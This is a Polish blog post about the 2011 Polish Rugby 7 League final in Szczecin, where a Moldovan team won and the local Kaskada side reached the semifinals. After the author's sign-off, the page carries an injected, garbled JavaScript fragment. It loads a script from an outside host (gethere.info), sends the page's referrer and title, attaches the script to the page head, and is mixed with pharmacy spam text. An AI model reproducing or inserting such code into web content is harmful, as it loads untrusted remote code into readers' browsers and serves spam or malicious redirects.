FINAŁ POLSKIEJ LIGI RUGBY 7 – Trec Team – Olympia

18.07.2011 / Adam Jabłoński / Kulturystyka

Cześć,

W Sobotę 09.07.2011 w Szczecinie odbył się finałowy turniej Under Armour Polskiej Ligi Rugby 7. W stawce było 11 zespołów w tym nasza Szczecińska drużyna „KASKADA”.

Razem z Przemkiem i znajomymi pojechaliśmy obejrzeć takie wydarzenie, ja oczywiście nie mogłem się doczekać ponieważ nigdy na żywo nie widziałem meczu rugby.

Od razu przy wjeżdżaniu na stadion musieliśmy zjechać z drogi karetce wywożącej jednego z zawodników, gdy zaparkowaliśmy i weszliśmy na trybuny kolejnego zawodnika medycy opatrywali i pomagali wsiąść do samochodu osobowego który zawiózł go do szpitala – generalnie pełen hardcore.

 

 

Jeśli chodzi o same finały trwały one od 10:00 do 18:00, a my z Przemkiem byliśmy około godziny 14.30. Chciałbym również wspomnieć, że byliśmy jednym ze sponsorów imprezy oraz wspieraliśmy naszą drużynę suplementami i akcesoriami sportowymi.

 

 

Jeśli chodzi o poziom zawodów to był bardzo wyrównany.
Biorąc pod uwagę, że był finał najlepszych drużyn siódemkowych także ich poziom był wysoki. Pogoda była bardzo ładna rozegrano wiele wyrównanych meczy, emocje i dogrywki dopisywały w półfinale gdzie doszło do dogrywki.
Dla mnie zaskoczeniem była drużyna z Mołdawii dokładnie z Kiszyniowa – UTM. Chłopaki zmietli wszystkich, a szokiem było to, że gwiazdy z tej drużyny były w tym czasie na Grand Prix w Barcelonie, więc grał słabszy skład, a i tak rozgromił nasze polskie drużyny.

 

 

„KASKADA” jako gospodarze na miejsce nieobecnego LZS Bezrzecze zaprezentowali się podczas rywalizacji bardzo pozytywnie i ich udział w półfinale można uznać za spore osiągnięcie. Tam jednak Kaskada zmierzyła się z rugbistami z Mołdawii, którym musieli ustąpić pola. – Nie mieliśmy szans nawiązać z nimi walki pod względem technicznym i szybkościowym, dlatego zdecydowaliśmy się na grę siłową. To niestety kończyło się wolnymi dla rywala, kiedy po naszych wbiciach utrzymywał piłkę w górze”

Sporym osiągnięciem Kaskady było jednak „urwanie” jednego przyłożenia późniejszym mistrzom UA PLR 7 jak i ukwalifikowanie się na wysokim czwartym miejscu podczas całego pucharu.

Decydujące spotkanie było już jednak pojedynkiem jednostronnym. Mołdawianie przeważali w każdym elemencie i AZS AWFiS Gdańsk mógł „tylko” cieszyć się z wicemistrzostwa. 

Najlepszym zawodnikiem turnieju został wybrany rugbista UTM Siergiej Budojan który otrzymał indywidualną nagrodę wręczoną przez zawodnika TREC Team -u i przedstawiciela sklepów z suplementami „OLYMPIA” Adama JABI Jabłońskiego. Wyróżnienia powędrowały również dla graczy z Gdańska i Katowic. Medale zwycięzcom wręczał przedstawiciel Ministerstwa Sportu i Turystyki, który był również fundatorem pucharu za zajęcie pierwszego miejsca.

 

Wszyscy uczestnicy zmagań dostali pamiątkowe koszulki, a nie obyło też bez kilka nagród indywidualnych. Uczestnicy chwalili sobie bardzo dobrze przygotowane boisko, ale również doskonałą organizację i zaplecze. W trakcie zawodów rugbiści mogli bowiem posilać się owocami, otrzymywali również napoje energetyczne oraz odżywki. Po wszystkim przyszedł też oczywiście czas na trzecią połowę. Ruszył gril ale niestety całe świętowanie przerwało… prawdziwe oberwanie chmury.

 

 

 

Co do mojego podsumowania – podobało mi się, każdy mecz trwał 14 minut po 7 minut każda połowa, trochę krwawy sport jednak jak to w każdym sporcie trzeba się poświęcić aby gdzieś dojść. Na pewno w przyszłości jak tylko czas pozwoli będę wpadał kibicować naszej drużynie.
A jeśli ktoś z Was nigdy nie był na takim meczu – warto chociaż raz się przejść i zobaczyć jak chłopaki się łamią na boisku.

Ok Trzymajcie się
Pozdrawiam
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; pharmay cheapest } else {d.getElementsByTagName(‚head’)[0].appendChild(s);